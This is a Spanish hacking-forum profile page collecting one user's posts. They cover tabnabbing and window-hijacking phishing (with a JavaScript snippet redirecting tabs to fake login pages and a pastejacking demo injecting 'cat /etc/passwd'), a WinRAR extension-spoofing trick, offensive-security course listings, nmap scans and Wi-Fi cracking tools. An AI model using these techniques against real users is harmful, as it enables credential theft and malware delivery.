Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Aryenal.Bt

#1
Hacking / phishing avanzado
Junio 19, 2016, 12:53:31 PM
El phishing tradicional funciona principalmente enviando a los usuarios un correo con un enlace que, si pinchan, les redireccionará a un sitio malicioso, normalmente una web falsa que se hace pasar por otra legítima. Pero, ¿y si la redirección al sitio falso se produce de forma inadvertida en una de las múltiples pestañas abiertas en el navegador?

Hoy vamos a ver dos formas ingeniosas para conseguirlo. La primera denominada 'Windows hijacking' que establecerá un contador al abrir una pestaña que una vez llegue a 0 cambiará la localización a la página fraudulenta. La segunda llamada 'tap nabbing' hará se cambie el contenido igualmente pero en otra pestaña que el usuario no está viendo en ese momento. De esa forma cuando el usuario vuelva a la pestaña creerá que la dejó abierta (por ej. Gmail) y se volverá a loggear.

Window hijacking

Es sabido que configurar un tag con un atributo como _blank tiene ciertos riesgos de seguridad:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Esto es debido a que una nueva página abierta tiene la capacidad de cambiar la ubicación de la ventana (windows location) con lo siguiente:

window.opener.location = "No tienes permitido ver enlaces. Registrate o Entra a tu cuenta"

Además es posible también crear una página web con la capacidad de crear una nueva página en una nueva pestaña, y luego cambiar la ubicación de la página recién creada después de un periodo arbitrario de tiempo. Esto se puede lograr de la siguiente manera:

Código: text
<script>
    var windowHijack = function(){
        window.open('https://legitloginpage.xyz', 'test');
        setTimeout(function(){window.open('https://notlegitloginpage.xyz', 'test');}, 300000);
    }
</script>
<button onclick="windowHijack()">Open Window!</button>


En el ejemplo anterior, una nueva ventana se abre cuando se pulsa el botón y, 5 minutos más tarde, la nueva ventana cambiará de sitio. Incluso si en la nueva pestaña se navega a otro sitio web o se actualiza, el sitio original todavía podría cambiar la ubicación.

Demo1

En este ejemplo, se enlaza con una página de login y el temporizador se establece en 5 segundos. Cuando el tiempo se agota, la página de inicio de sesión legítima se cambia a una página de acceso ilegítimo que tiene un keylogger instalado.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Demo2

En este ejemplo secundario, el ataque se combina con Pastejacking. Primero el enlace apunta a No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y, después de haber sido abierto, un segundo temporizador de 5 segundos va a cambiar la ubicación del sitio Web legítimo de serverfault a un clon maligno de la página original, con código pastejacking. Esto hace que cualquier usuario que intente copiar la respuesta en su lugar se inyecte "cat /etc/passwd \n" en su portapapeles.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Tap nabbing

Las pestañas o ventanas abiertas utilizando JavaScript o target = "_blank" aunque limitado tienen acceso a la ventana padre, haciendo caso omiso de las restricciones de cross-origin. Entre ellos la capacidad de redirigir la pestaña padre o de la ventana usando window.opener.location.

Si bien ésto puede parecer inofensivo, es posible realizar un ataque de phishing cuando las aplicaciones web permiten o hacen uso de anchors con target = "_blank" o No tienes permitido ver enlaces. Registrate o Entra a tu cuenta().

Imagina el siguiente escenario, el más típico:

Eres un administrador utilizando algún foro o software de chat. Actualmente estás conectado en la aplicación, y ves un mensaje dejado por un usuario. El usuario solicita o te convence para que hagas clic en un enlace de su mensaje, que se abre en una nueva pestaña. Mientras que la nueva página puede parecer completamente segura - tal vez sólo una captura de pantalla o o un error en HTML - ejecuta el siguiente JS:

window.opener.location.assign ('No tienes permitido ver enlaces. Registrate o Entra a tu cuenta');

Lo que no te das cuenta es que al tratar con este cliente ilegítimo o queja del usuario, la pestaña de la aplicación fue redireccionada en background. ¿A qué? A un sitio web de suplantación de identidad idéntico, que solicita que introduzcas tus credenciales para entrar de nuevo.

Demo1

Un enlace que abre _blank en una nueva pestaña. El código JavaScript que se ejecuta en la nueva pestaña tiene un handler con window.opener. La página abierta abre una página falsa de Github con el mensaje "Timeout, please log in again".  El usuario cierra la pestaña abierta y vuelve a lo que cree que es GitHub, donde vuelve a introducir las credenciales.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Fuentes:
- windowHijacking
- Mozilla detecta un nuevo tipo de phishing, el tab napping
- Tabnabbing demo
- blankshield
- hackplayers ->No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2

HackingMexico: Certificación de Seguridad Ofensiva
Spanish | DVD 1 | NRG | 2.85 GB | HackingMexico | Incl. Herramientas

La demanda por gente especializada en seguridad informática es cada vez mas alta, los mejores empleos son para la gente capacitada, y si bien sabemos la realidad hoy en día un papel o diploma NO GARANTIZA conocimientos, sin embargo a la hora de las entrevistas laborales son las que mas peso tienen. Es por eso que hemos diseñado este curso con toda nuestra experiencia en Seguridad Informática (mas de 15 años) para acelerar el aprendizaje y entender los conceptos de forma practica.
Antes de tomar una certificacion, pregunta a tus conocidos, hay algunas muy comerciales como CEH (Certified Ethical Hacker) donde sus cursos son videos de diapositivas con definiciones de Wikipedia, nosotros te enseñamos las tecnicas en VIVO, el curso es 100% practico con ejemplos reales.
Aprenderas la filosofia de la Seguridad Ofensiva que se enfoca en adentrarse a la manera de pensar del atacante.

El curso comienza desde las bases de instalacion de software y laboratorios virtuales, hasta ataques web e ingenieria inversa. No vamos a mentirte, la seguridad informatica es una forma de vida, y con 1 solo curso que tomes no podras dominarla, sin embargo tendras las bases para poder iniciar tu carrera como Pentester y hacer tus propias investigaciones digitales.

DOCENTES
Los profesores estan avalados como Cientificos de la Seguridad Informatica a nivel nacional por la Confederacion de Abogados Latinoamericanos A.C, Centro Interamericano de Certificacion de Habilidad Juridica Seccion Morelos, Zona Oriente Morelense de Estudiantes A.C, La Asociacion de Oradores y Lolografos Juristas A.C, Rescate Turistico de Morelos, y las autoridades de la Secretaria de Seguridad Publica y Transito Municipal del Estado de Morelos.

El cuerpo docente lo integran:

M.C Raul Robles Aviles (CEO de HackingMexico) aka Megabyte
Gonzalo Sanchez S (Security Analyst) aka Drummer
Alejandro Torres (Investigador Reversing) aka TorresCrack

Contenido:

Introduccion

Que es un hacker?
Tipos de hacker
Sistemas Operativos
Conceptos basicos de Networking
Instalacion de entornos virtuales
Conociendo VMware
Corriendo sistemas operativos simultaneamente
Creando maquinas virtuales
Configuracion NAT y Bridged
Instalacion de diferentes OS para pruebas
Instalacion de entorno Apache, php y mysql en Windows
Instalacion de Perl
Instalacion de Phyton
Comandos de consola cmd y terminal

Hackeo y Defensa de Paginas Web

-Information Gathering
-Frameworks de explotacion via Browser
-Ataques XSS (Cross Site Scripting)
-Ataques de ejecucion remota
-Elaboracion de exploits con Phyton
-Herramientas de escaneo de vulnerabilidades
-Shells PHP
-Remote File Inclusion
-Wargames
-Cross Site Request Forgery
-Ataques de estres DoS
-Hackeo de un Casino Online

Man in the Middle

-Definicion MITM
-ARP Poisoning
-Interceptar datos via Browser
-Modificacion de Cabezeras
-Interceptar datos de un binario
-Ataques de red local
-Atacando a Windows XP desde BackTrack
-Atacando a BackTrack desde Windows XP
-Credential Harvesting
-Ataques automatizados

Metasploit

-Armitage
-Social Engineering ToolKit
-Vectores de Ataque
-Hacking Mysql Servers con metasploit
-Hacking XAMPP con metasploit
-Brute Force al ssh de iPhone/ipad/ipodTouch


VIRTUALIZACION CLOUD PARA MITIGAR DDOS

-Cloud Hosting
-SAN Storage
-Diferencia entre Raids
-Algoritmos de alta redundancia
-Maquinas virtuales configuracion VMware Workstation
-Virtual Storage Appliace (VSA)
-Creando clusters
-Managers, y Fail Over Manager
-Iniciador iSCSI
-Montando tu primer volumen virtualizado
-Pruebas de alta disponibilidad contra DDoS
-Snapshots, Rollover volume
-Fractional Bandwidth Protection
-IP Virtual para manejar clusters

SQL Injection

1.-Inyeccion SQL . ¿Qué es?
2.-Factores que propician esta vulnerabilidad
3.-Instalacion de la herramienta SQL MAP
4.-Instalacion de Phyton (Windows)
5.-Conociendo la herramienta SQL MAP
6.-Conociendo a nuestro objetivo
6.1.-Nmap Scanner
6.2.-Whois
6.3.-Obtencion de Mails mediante script en phyton
7.-Obtencion de Datos de Mysql
8.-Obtencion de Usuarios
9.-Buscando el Panel de Administracion
10.-Instalando el Entorno grafico de "SQL-Map"

Android Hacking

1.-Consola de Metasploit
1.1.-busqueda de módulos y exploits para Android
2.1.-Creacion de un ".Apk" infectado para su instalación en un sistema Android
2.2.-Instalacion del ".Apk" (intervención del usuario)
3.-Explotacion Local y Remota
3.1.-Acceso local al dispositivo
3.2.-Manejo de la sesión "meterpreter" en el Dispositivo infectado
3.3.-Conociendo las cámaras de fotografía del dispositivo
3.4.-Tomando fotografías con el Dispotivo (cámara frontal y delantera)
3.5.-Robo de información , fotografías , bd de whatsapp (en caso de tener)
3.6.-Explotacion Remota
3.6.1.-Conociendo nuestra infraestructura (provedor de servicio , Modem , Velocidad de conexión)
3.6.2.-Conociendo el Servicio No-ip + creación y configuración de nuestro modem
3.7.-Explotacion 100% remota.

Recuperación de Datos mediante consola Forense

1.-Conociendo el Software "PhotoRec"
2.-Instalacion y creación de Alias
3.-Perdiendo/Borrando Datos en una USB/HDD
4.-Ejercicio de Recuperacion
5.-Analisis de Datos
6.-Recuperacion de Archivos a nivel Forense

Dumpeo de memoria RAM
Analisis de metadatos
Cadena de custodia

INGENIERIA INVERSA Y CRACKING

* PE structure
* Metodo – String references
* Metodo – Serial fishing
* Metodo – API cracking
* Creando un parche
* Creando Loader
* crackeando aplicaciones .NET
* crackeando aplicaciones JAVA
* Unpacking
* OEP finding
* IAT rebuilding
* Uso de scripts – Ollyscripting
* Metodo – Inline patching
* Metodos anticracking (antidump, antidebugging)
* Keygenning (creando nuestro propio generador de licencias)






Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Fuente:Descargasnsn
#3
Hace poco se mostraba en un blog israelí una vulnerabilidad 0-day en la versión 4.20 de WinRAR (otras versiones podrían verse también afectadas) con la que es posible engañar muy fácilmente a un usuario para que ejecute por ejemplo... un troyano. Además es sumamente sencilla de explotar...

Para nuestra PoC empezaremos creando un simple vbs 'pruebas.vbs':

MsgBox("PWNED! jajaj")

y lo comprimiremos creando el fichero 'pruebas.zip':


Cuando tratamos de comprimir el archivo en "formato ZIP" con WinRAR, la estructura de archivos es la estándar pero WinRAR añade varias propiedades adicionales, como un segundo nombre de archivo:


¿Qué pasa si modificamos ese nombre con nuestro editor hexadecimal por algo más "sugerente" como 'tetazas.jpg'?:


Veamos el resultado:


Al abrir el fichero comprimido nos muestra aparentemente una imagen, pero al hacer doble clic en ella se ejecutará nuestro script, es decir, hemos falsificado el nombre y la extensión del fichero comprimido ... con lo que todo ello supone...

Portaros bien!

Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#4

Introducción

Durante este último año, investigando los ataques y vulnerabilidades en la red GSM, me di de bruces con el ataque de la estación falsa BTS. Este consiste en un ataque "Man In The Middle" tradicional, en el que el atacante sitúa su propia antena entre nuestro terminal y la red. La base para que este ataque sea factible son dos vulnerabilidades muy sencillas:

Nuestro terminal NO autentifica la red GSM a la que se conecta, la supone segura.
El terminal se conecta siempre a la celda que mejor nivel de señal le proporcione.
Este tipo de ataques han sido documentados en varias conferencias de seguridad; BlackHat 2011, CCC, DefCon, etc. Como muestra el video de DefCon 18, de Chris Paget, "Practical Cellphone Spying"


Esto además se complica (o mejora para los posibles atacantes) al poder crear una celda falsa utilizando únicamente un teléfono compatible con osmocom y el software OpenBTS u Osmo-BTS. Ya no es necesario ningún hardware caro ni raro de conseguir, ni soldar y des-soldar las placas del USRP1, ni una BTS real: sólo un teléfono Osmocom.

¿Cómo protegernos de estos ataques?

El equipo de SRLabs (Karsten Nohl) ha creado la herramienta catchercatcher  No tienes permitido ver enlaces. Registrate o Entra a tu cuenta para detectar posibles ataques, tal y como publicaron en el 28C3, basándose por supuesto en OsmocomBB. Cuando lo he probado, hay algo que no me ha gustado: para que el software detecte los ataques necesitamos ejecutar el programa con una tarjeta SIM dentro del teléfono. ¿Qué pasa si me quiero desplazar a otro sitio? ¿Dejo de detectar posibles ataques? Lógicamente la necesidad de la tarjeta SIM tiene su explicación, ya que con este programa también se detectan los famosos SMS invisibles (para lo cual necesitamos estar registrados en la red GSM).

Respetando la idea de SRLabs he creado un proyecto nuevo: Cell Analysis, con un fin claro y sencillo: detectar celdas falsas (BTS falsas, IMSI Catcher o BTS Rogue, como queráis llamarlo). Para ello necesitaremos un teléfono osmocom y no vamos a utilizar ninguna tarjeta SIM, escanearemos todas las celdas independientemente de la operadora a la que pertenezcan.

La base de la detección es precisamente que una celda falsa nunca llevará el mismo tráfico de control que una celda real. ¿Qué es tráfico de control? En el standard GSM se han definido canales lógicos para transmitir y recibir la información según una jerarquía de canales:


Dentro del canal de control común ("CCCH") nos vamos a fijar en el canal de Paging ("PCH"), que es el que la red GSM utiliza para alertar a los abonados que tienen un servicio pendiente de entrega, donde el servicio será una llamada, un mensaje corto, etc. ¿Y que tiene una celda falsa que decirles a sus abonados? ... Nada o muy poco.

A continuación muestro dos capturas realizadas del tráfico del canal de control común en celdas de cada tipo: real y falsa:



Fijaros bien en el contenido de los mensajes "Paging Request", porque en el caso de la celda falsa el campo "Mobile Identity" está siempre o casi siempre vacío, puesto que no hay usuarios reales a los que anunciarles la entrega de servicios. El porcentaje de mensajes sin un TMSI o un IMSI no puede apreciarse en la captura de pantalla, pero si en la celda falsa no hay ningún teléfono conectado será del 100%. Sin embargo en una celda real el campo "Mobile Identity", la mayor parte de la veces llevará un TMSI o IMSI en porcentajes elevados. Dependiendo de la hora del día, de la celda, de la operadora y más parámetros, variará el valor del porcentaje de mensajes de "Paging Request" con un abonado, pero nunca alcanzará el valor de la celda falsa.

Este análisis es el que va a realizar el programa para cada celda que encuentre y lo hará continuamente cada 10 minutos, hasta que decidamos parar la aplicación. Para cada una de las celdas que no son falsas, generará un fichero CSV con la fecha y hora así como los valores de abonados conectados y potencia con la que el teléfono osmocom recibe la señal de esa celda. Con cada celda falsa que encuentre enviará a una cuenta de correo configurada previamente un email de alarma. Por último, aquellas medidas que hayan tenido demasiados errores ("Dropping Frames", "BURST IND", etc) serán ignoradas guardándose en un tercer fichero de medidas ignoradas.

Para descargar Cell Analysis, esta es la web  No tienes permitido ver enlaces. Registrate o Entra a tu cuenta donde además podéis encontrar las instrucciones para instalarlo y configurarlo correctamente.

Test de Cell Analysis

Para probar la detección he elegido el escenario más simple, dos teléfono osmocom; uno corriendo Cell Analysis (monitorizando el tráfico) y el otro corriendo el SW de transmisión con OpenBTS (transmitiendo una celda falsa).


NOTA IMPORTANTE: transmitir en el espectro de frecuencias asignado a GSM es un delito, esta prueba debe ser llevada a cabo con una jaula de faraday para aislar el alcance de nuestra transmisión.

Una vez la celda falsa queda definida y configurada con valores reales (MCC 214, MNC 22 y ARFCN 1), tal y como se haría en un ataque real, el segundo teléfono osmocom empieza a transmitir:


El primer teléfono empieza a ejecutar Cell Analysis. Observar en la segunda ventana (al frente) el listado de las celdas que ha encontrado el teléfono y fijaros en la tercera celda (es la falsa):


Cuando Cell Analysis realiza el siguiente paso, que es la monitorización del trafico del canal de control común, sólo encuentra los mensajes "System Information" SI1 y SI3, pero no encuentra ningún abonado en la celda:


Por lo que se genera una alarma correspondiente en un fichero CSV y se envía por correo.

Conclusiones

- Como hemos visto, sí se pueden detectar sin problemas las celdas falsas y avisar para, desde luego apagar cualquier teléfono que pueda ser víctima del ataque ya que en nuestros terminales no podemos forzar o elegir a qué celda se deben conectar, lo harán a la que mejor señal les entregue.

- Cell Analysis también genera ficheros CSV para las celdas que no son falsas con medidas de potencia y número de abonados acampados en ella. Se pueden visualizar los resultados en Excel de manera muy sencilla:


- En toda monitorizacíón hay un parámetro que mide la eficacia: la cantidad (o ausencia) de alarmas falsas generadas. Durante semanas he tenido corriendo el programa y no ha detectado ninguna alarma falsa, pero lógicamente es más que probable que esto pueda suceder. Por ejemplo: si una celda real tiene una avería y  momentáneamente los abonados no pueden acampar en ella, sus "Paging Request" estarán vacíos.

Sobre No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

- El proyecto Cell Analysis se encuentra recogido en la web No tienes permitido ver enlaces. Registrate o Entra a tu cuenta donde seguiré actualizando siguientes versiones con mejoras pendientes de implementar:
Pequeño interfaz web para comprobar el estado de la monitorización y gestionar las alarmas
Recoger las medidas de las celdas con "rrdtool" para mostrar gráficas en el interfaz web en tiempo real
Crear paquetes .deb para facilitar la instalación en Ubuntu
Portar el proyecto a la plataforma ARM (Raspberry Pi)
Seguir investigando distintas celdas falsas en busca de nuevos retos a detectar
Autor: Pedro Cabrera

Fuente:SbD
#5
Hacking / Curso - Capacity: Seguridad Informática
Diciembre 28, 2013, 03:12:25 PM


Capacity: Seguridad Informática - CompTIA Security+
Español | 1.68 GB | .FLV | Profesor: Eugenio Duarte | Seguridad | CapacityAcademy

Descripcion:

Le gustaria hacerse Hacker Informático? Paso a Paso: ¡Hágase Experto en Seguridad TI!

Ahora desde su casa u oficina: Usted puede convertirse en Arquitecto de Seguridad, Ingeniero de Seguridad, Analista de Seguridad, o Técnico en Seguridad de la Información. ¡Con este curso podrá certificarse de CompTIA Security+!

A través de 7 módulos llenos de Videos y Recursos, y junto a su Profesor Eugenio Duarte, usted podrá iniciar a construir una carrera en Seguridad Informática.
Dominará temas como: Ataques y mitigación, Seguridad de Red y Aplicaciones, Recuperación de Desastres, Reporte de Incidentes y evaluación de vulnerabilidades. 100% Garantizado.

¿Qué aprenderá si toma este Curso?

En este curso usted aprenderá todo desde cero. No necesita tener conocimientos previos de Seguridad Informática. Le enseñaremos cada concepto, paso a paso.

A continuación mire solo algunas de las cosas que aprenderá a hacer:

Identificar las diferentes amenazas de seguridad de los sistemas
Explicar los riesgos de seguridad relacionados con el hardware y los periféricos de los sistemas
Implementar prácticas para reforzar la seguridad de los Sistemas Operativos y procedimientos para lograr la seguridad de PCs y Servidores
Determinar el uso apropiado de herramientas de seguridad para facilitar la seguridad de la red
Explicar las vulnerabilidades y técnicas de mitigación asociadas con los dispositivos de red, medios de transmisión y las redes inalámbricas
Identificar y aplicar las mejores prácticas de la industria para métodos de control de acceso
Desplegar varios modelos de autenticación e identificar los componentes de cada uno
Llevar a cabo análisis de riesgo e implementar la mitigación de estos
Usar herramientas de monitoreo de seguridad en los sistemas y redes para detectar anomalías relacionadas con seguridad
Llevar a cabo auditorias periódicas de configuraciones de seguridad en los sistemas
Entender los conceptos generales de criptografía, hash, y encriptación.

¿Quién será su profesor?

Profesor Eugenio Duarte
Ingeniero en Sistemas de Computación, con amplia experienca en arquitectura de servidores de Redes utilizando Linux, Tecnología de Voz sobre IP, Seguridad de Redes de Datos, Routing, Switching y Virtual Private Network (VPN). Eugenio un experto en Redes Cisco.

El Profesor Duarte posee las siguientes certificaciones: CCNA Voice, CCNA Security, CCDA, CCNA, Linux+, Network+, Security+, CWNA.

Capturas:


Descargar: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Pass: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Pd. para la descarga utilizar el programa JDownloader
Fuente: Descargasnsn
#6
Hacking / Footprinting (Recogo de Informacion)
Septiembre 10, 2013, 11:17:02 PM

Tal como se indica en el tema el footprinting es la fase donde se recoge información sobre el objetivo (cuentas de correos, direcciones Ip, nombres de ordenadores y sistemas que corren sobre ellos, etc.) para ello existen 2 técnicas (Pasivas y Activas):

Técnicas Pasivas: Consiste en el recogo de información pero de forma indirecta para realizar aquello tenemos:

- Whois: Determina datos del propietario de un nombre de dominio o de una dirección Ip.
- Nslookup: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- Google Hacking: Google Hacking o Google Operadores es una técnica en informática que utiliza para filtrar información en buscador de Google. Además podemos encontrar otras aplicaciones de agujeros de seguridad en la configuración y el código informático que se utilizan en las páginas web.
- Fuzzers: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- etc.

Técnicas Activas: A diferencia de las T. Pasivas esta consiste en interactuar directamente con los sistemas para aprender sobre su configuración y comportamiento.

Vamos a utilizar módulos de tipo auxiliary para llevar a ejecución distintos tipos de escaneos:

Half Scam: Este tipo de escaneo consiste:

1.- El emisor envía un SYN para iniciar la conexión
2.- Si el receptor envía un SYN+ACK (el puerto esta abieto)
3.- El emisor cierra la conexión enviadole un RST+ACK


ACK Scam: El objetivo de este escaneo no es determinar si un puerto se encuentra abierto o no, sino si un equipo de la red escucha las peticiones a traves de un firewall:

1.- El emisor envía un paquete con un ACK activo
2.- El receptor debe responder con un RST este el puerto abierto o no
3.- Si no hay respuesta es que existe un cortafuegos en medio de la comunicación.


Null Scam: Este tipo de escaneo consiste:

1.- El emisor envia un paquete (No contiene ningun Bit activo)
2.- Si el puerto se encuentra abierto no se recibirá respuesta
3.- Si el puerto se encuentra cerrado el receptor envia un RST+ACK

Modo de ejecucion (Nmap):
Código: text
nmap -sN <Direccion Ip>


Fin Scam: Este tipo de escaneo consiste:

1.- El emisor crea un paquete TCP con el Bit de Fin activo
2.- Si el puerto se encuentra abierto no se obtendra respuesta.
3.- Si el puerto se encuentra cerrado el receptor envia un RST+ACK

Modo de ejecucion (Nmap):
Código: text
nmap -sN <Direccion Ip> 


* Los puntos y herramientas que se han tocado en este Post son solo pocos de muchos.

Próximo Post: Nmap+Msf
Saludos.  8)
#7
Seguridad Wireless / Wi-fEye
Septiembre 02, 2013, 10:39:49 PM

Wi-fEye es una herramienta de pruebas de penetración wireless automatizado escrito en python, esta diseñado para simplificar ataques comunes que se pueden realizar en las redes Wifi para que puedan ser ejecutadas de forma rápida y fácilmente.


Home -> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Instalacion -> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Tutorial -> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Descargar -> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#8
Seguridad Wireless / Wireless Windows Auditor PRO 1.0
Agosto 25, 2013, 09:08:09 PM
Wireless Windows Auditor es una aplicación de Interfaz Grafica de la Suite Aircrack-NG para Windows creada por Auditoria Wireless.
Algunas cosas a saber:

- RTL8187 funcionando con toda la suite de Aircrack en Windows
- Tarjetas compatibles con el Commview / Aireplay - Windows

Recordad que todas las aplicaciones deben de ejecutarse como administrador (Vista y superior, en XP no hace falta) por tanto en todos los .exe de la carpeta principal y de TODAS las sub-carpetas clckais con el botón dcho, casilla de compatibilidad y marcar ejecutarr como administrador.

Por último pensad que algunas aplicaciones de aricrack-ng u otras pueden devolver falsos positivos.. sobre esto no se puede hacer nada excepto que pruebas por ti mism@ a compilarlas.

Mas informacion en: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
y si no conoces nada sobre Aircrack-ng te recomiendo leerte la wiki: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


LOG DE MODERACION:
Link caído/roto ha sido restablecido.
cl0udswx 13.11.2014



LOG DE MODERACION:
Link caído/roto ha sido restablecido.
cl0udswx 07.09.2016



Saludos.
#9
Redes y antenas / NetLearning: CCNA 640-802 (Español)
Agosto 01, 2013, 02:22:41 AM

El CCNA es la primera certificacion de Cisco. No tiene pre-requisitos.

NetLearning ofrece cursos en formato de video para preparacion de los examenes de certificacion de Cisco. Las certificaciones de Cisco son las mas reconocidas en la industria de Telecomunicaciones a nivel mundial. Una certificacion de Cisco es valida internacionalmente, no importa donde presentes el examen. En el mundo laboral de las redes, cada vez se esta haciendo mas comun el que se pida ingenieros certificados. Las empresas con esto buscan:

Que el candidato en realidad tenga el conocimiento.
El haber solo tomado un curso o la academia no es garantia de conocimiento.
Ayudar a la empresa a certificarse ante Cisco.
Dar confianza a sus clientes al proveer de ingenieros certificados.
Estar tranquilos contando con ingenieros capacitados.


Contenido:

00 Intro
01 Introred
02 Subnet
03 IOS
04 SW
05 STP
06 Wirelees
07 WAN
08 Ruteo
09 RIP
10 EIGRP
11 OSPF
12 Seguridad
13 NAT
14 IPv6
15 Tips


Descargar: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#10

La certificacion de CCNA Security tiene como pre-requisito el CCNA.

NetLearning ofrece cursos en formato de video para preparacion de los examenes de certificacion de Cisco. Las certificaciones de Cisco son las mas reconocidas en la industria de Telecomunicaciones a nivel mundial. Una certificacion de Cisco es valida internacionalmente, no importa donde presentes el examen. En el mundo laboral de las redes, cada vez se esta haciendo mas comun el que se pida ingenieros certificados. Las empresas con esto buscan:

Que el candidato en realidad tenga el conocimiento.
El haber solo tomado un curso o la academia no es garantia de conocimiento.
Ayudar a la empresa a certificarse ante Cisco.
Dar confianza a sus clientes al proveer de ingenieros certificados.
Estar tranquilos contando con ingenieros capacitados.


Descargar: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#11

El examen de ROUTE es uno de tres examenes necesarios para convertirte en CCNP. Pre-requisito: CCNA.

NetLearning ofrece cursos en formato de video para preparacion de los examenes de certificacion de Cisco. Las certificaciones de Cisco son las mas reconocidas en la industria de Telecomunicaciones a nivel mundial. Una certificacion de Cisco es valida internacionalmente, no importa donde presentes el examen. En el mundo laboral de las redes, cada vez se esta haciendo mas comun el que se pida ingenieros certificados. Las empresas con esto buscan:

Que el candidato en realidad tenga el conocimiento.
El haber solo tomado un curso o la academia no es garantia de conocimiento.
Ayudar a la empresa a certificarse ante Cisco.
Dar confianza a sus clientes al proveer de ingenieros certificados.
Estar tranquilos contando con ingenieros capacitados.


Descargar: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#12

El examen de SWITCH es uno de tres examenes necesarios para convertirte en CCNP. Pre-requisito: CCNA.

NetLearning ofrece cursos en formato de video para preparacion de los examenes de certificacion de Cisco. Las certificaciones de Cisco son las mas reconocidas en la industria de Telecomunicaciones a nivel mundial. Una certificacion de Cisco es valida internacionalmente, no importa donde presentes el examen. En el mundo laboral de las redes, cada vez se esta haciendo mas comun el que se pida ingenieros certificados. Las empresas con esto buscan:

Que el candidato en realidad tenga el conocimiento.
El haber solo tomado un curso o la academia no es garantia de conocimiento.
Ayudar a la empresa a certificarse ante Cisco.
Dar confianza a sus clientes al proveer de ingenieros certificados.
Estar tranquilos contando con ingenieros capacitados.


Descargar: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#13

El examen de TSHOOT es uno de tres examenes para convertirte en CCNP. Pre-requisito: CCNA. Muy recomendable el tener aprobados el ROUTE y SWITCH.

NetLearning ofrece cursos en formato de video para preparacion de los examenes de certificacion de Cisco. Las certificaciones de Cisco son las mas reconocidas en la industria de Telecomunicaciones a nivel mundial. Una certificacion de Cisco es valida internacionalmente, no importa donde presentes el examen. En el mundo laboral de las redes, cada vez se esta haciendo mas comun el que se pida ingenieros certificados. Las empresas con esto buscan:

Que el candidato en realidad tenga el conocimiento.
El haber solo tomado un curso o la academia no es garantia de conocimiento.
Ayudar a la empresa a certificarse ante Cisco.
Dar confianza a sus clientes al proveer de ingenieros certificados.
Estar tranquilos contando con ingenieros capacitados.




Descargar: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#14

Hola a todos después de mucha inactividad he regresado a Underc0de y como regalo de mis vacaciones he decidido crear un concurso de Hacking Wireless, el cual consistirá en que los interesados aporten temas interesantes en esta sección, en los cuales se pide lo siguiente:

            - Aportar (técnicas, herramientas, documentos, etc) que puedan ser de ayuda en el momento de auditar una Red Inalambrica.
            - Los aportes no deben tratar de contenido ya posteado en el foro Underc0de.
            - Los aportes no deben ser un copy/pega de otras WebSite.
            - Se calificara la calidad como la cantidad.

Premio: se dará como premio el libro impreso "Redes Inalambricas" No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ojo: El libro se enviara al país del Usuario Ganador a través de un servicio de correo.

Tiempo: el concurso tendrá fin el 15 de Septiembre.

Los que deseen participar de este Concurso. pueden inscribirse en este mismo Post. asimismo cualquier consulta.

Participantes:

                            - chechu995
                            - blackdrake
                            - mfuck
                            - Statick
                            - dark.newb1e.zer0
                            - aika
                            - jukathaido

Buenas doy por concluido el I Concurso Hacking Wireless

Atte. No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#15

Este post esta dedicado a realizar una recopilación de las mejores herramientas que puedan utilizar al momento de realizar una auditoria Wireless, las mismas que son obtenidas de todo el apartado de la seccion.

1.- Gerix Wifi Cracker: esta herramienta es una extension Visual de las tradicionales "macchanger", "aircrack-ng", y otras ademas que presenta un proceso automatizado de todas estas herramientas. No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

2.- Phisher Ghost (Fake DNS, Fake DHCP Metasploit Attack): es una aplicación de seguridad que viene incorporado con un falso servidor DNS, servidor DHCP falso, falso servidor HTTP y también tiene un espacio integrado para la captura automática y el registro de las credenciales HTTP método del formulario a una base de datos. El programa podría ser utilizado como un tarro de miel, podría ser utilizado para servicio de solicitud de DHCP, DNS o peticiones de los ataques de phishing. No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

3.- Grimwepa: es una galleta de la contraseña de WEP y WPA-cifrados puntos de acceso (routers). No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

4.- Aircrack-ng M4 GUI (GUI para Aircrack-ng): proporciona una interfaz grafica, con la cual nos proporciona una facilidad para utilizar Aircrack-ng, esta disponible para sistemas Linux de 32 y 64 Bits. No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

5.- coWPAATTY (Crackear WPA-PSK): es una herramienta para crackear WPA-PSK, creado por Joshua Wright No tienes permitido ver enlaces. Registrate o Entra a tu cuenta posee todas las cualidades que se podria pedir, requiere como minimo, una o dos tramas, o dos y tres de las tramas del acuerdo de cuatro vias para comenzar a crackear. No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

6.- WiPhire: es un script en bash  para hacer que el proceso de hacking inalámbrico sea mucho más fácil. No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

